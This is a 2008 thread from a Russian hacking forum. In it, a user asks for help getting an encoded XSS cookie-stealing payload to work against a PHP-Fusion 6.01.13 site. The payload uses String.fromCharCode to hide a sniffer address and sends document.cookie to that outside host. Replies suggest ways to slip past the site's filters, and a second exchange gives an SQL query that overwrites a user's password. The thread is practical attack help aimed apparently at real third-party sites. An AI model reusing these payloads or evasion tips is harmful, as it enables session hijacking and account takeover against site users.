ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.03.2008, 15:05
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
krypt3r
Чем это ты кодируешь?
----------------------------------
Так бы и сделали
`><script>img = new Image(); img.src = String.fromCharCode(0x68,0x74,0x74,0x70,0x3a,0x2f, 0x2f,0x73,0x2e,0x6e,0x65,0x74,0x73,0x65,0x63,0x2e,
0x72,0x75,0x2f,0x73,0x6e,0x69,0x66,0x2e,0x67,0x69,
0x66,0x3f)+document.cookie;</script>
не работает  |
|
|
28.03.2008, 15:15
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Все, что внутри String.fromCharCode() - это коды символов в гексальной системе.
Алерт-то хоть выскакивает? =) Попробуй потренироваться на замене имеющейся картинке страницы типа
Код:
document.images(0).src = <путь к какой-нить картинке>;
Если картинка поменялась, пробуй в src вставить код сниффера
|
|
|
|
28.03.2008, 15:25
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
Алерт-то хоть выскакивает? =)
конечно )))
И мои куки показывает, если попросить их через запрос вида
`><script>alert(document.cookie)</script>
Но на снифер не отправляет.
Сайт на котором пытаюсь провернуть (PHP-Fusion 6.01.13)
может в нем загвоздка?-так ведь алерт есть
|
|
|
|
28.03.2008, 16:00
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
А может в том, что ковычки фильтруются или пробелы? пробуй так:
"><script>alert("xss")</script>
віжу у тя
значь тока под ИЕ сойдёт, если другие кавычки не употреблять.
НО теж говорили зачарить смволы:
`><script>img=new/**/Image();/**/img.src=String.fromCharCode(ТУТА+ЗАЧАРИ НЫЙ+АДРЕС)+escape(document.cookie);</script>
вместо пробелов /**/, на случай если они фильтруются
или попробуй маниуляции с document.write(String.fromCharCode(ТУТ+ЗАЧА РИННЫЙ ВЕСЬ СКРИПТ))
Последний раз редактировалось Constantine; 29.03.2008 в 18:04..
|
|
|
|
28.03.2008, 16:28
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
А может в том, что ковычки фильтруются или пробелы? пробуй так:
Цитата:"><script>alert("xss")</script>
віжу у тя
Цитата:`>
значь тока под ИЕ сойдёт, если другие кавычки не употреблять.
Ковычки и правда фильтруются, запрос работает только такого вида:
`><script>alert(/123/)</script>
или когда в скобках (document.cookie)
остальные запросы идут лесом  почему же только в ИЕ?-у меня на опере показывает
пробелы пробовал заменять еще вчера-ничего не вышло
--------------------------------------------------------------------
уже все(из посоветованого), перепробовал и ничего не работает. Могу только увидеть свои куки, но любые попытки отправить их на снифер, заканчиваются обломом
За ответы, всем ОГРОМНОЕ спасибо, но они ни к чему так и не привели.
--------------------------------------------------------------------
Последний раз редактировалось samarin; 28.03.2008 в 18:30..
|
|
|
|
28.03.2008, 18:27
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
я о том что javascript:alert(`xss`) сработет в ІЕ, да и то не во всех версиях. Тут можно обойтись без кавычек, а выще, стукни мне в асю - 8-0-8-8-0-3-6 - помогу
|
|
|
|
29.03.2008, 17:18
|
|
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме:
99208
Репутация:
21
|
|
Здравствуйте, скажите пожалуйста, как в Sql инжекции выполнить Update запрос к базе?
|
|
|
|
29.03.2008, 18:31
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 Spaise
Примерно так:
update таблица set password='пароль или хеш' where login='логин юзера'
Надеюсь понятно , что password и login это условно. Нужны твои столбцы
Последний раз редактировалось jokester; 29.03.2008 в 18:33..
Причина: дополнение
|
|
|
|
29.03.2008, 18:46
|
|
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме:
99208
Репутация:
21
|
|
Сообщение от jokester
2 Spaise
Примерно так:
update таблица set password='пароль или хеш' where login='логин юзера'
Надеюсь понятно , что password и login это условно. Нужны твои столбцы
Такой запрос катит из PhpMyAdmin, в скуле нужно количество столбцов указывать, вот здесь и облом, ни чего обновить не получается.
|
|
|
|
29.03.2008, 18:49
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
нет. в мускуле в скл-иньекции нельзя при основном запросе если он изначально идет не update произвести апдейт ) то есть тут нельзя разделить запрос на подобие мсскл id=1;update blabla set blabla='xek' where blabla
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
|
|
|
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|
Похожие темы
Линейный вид
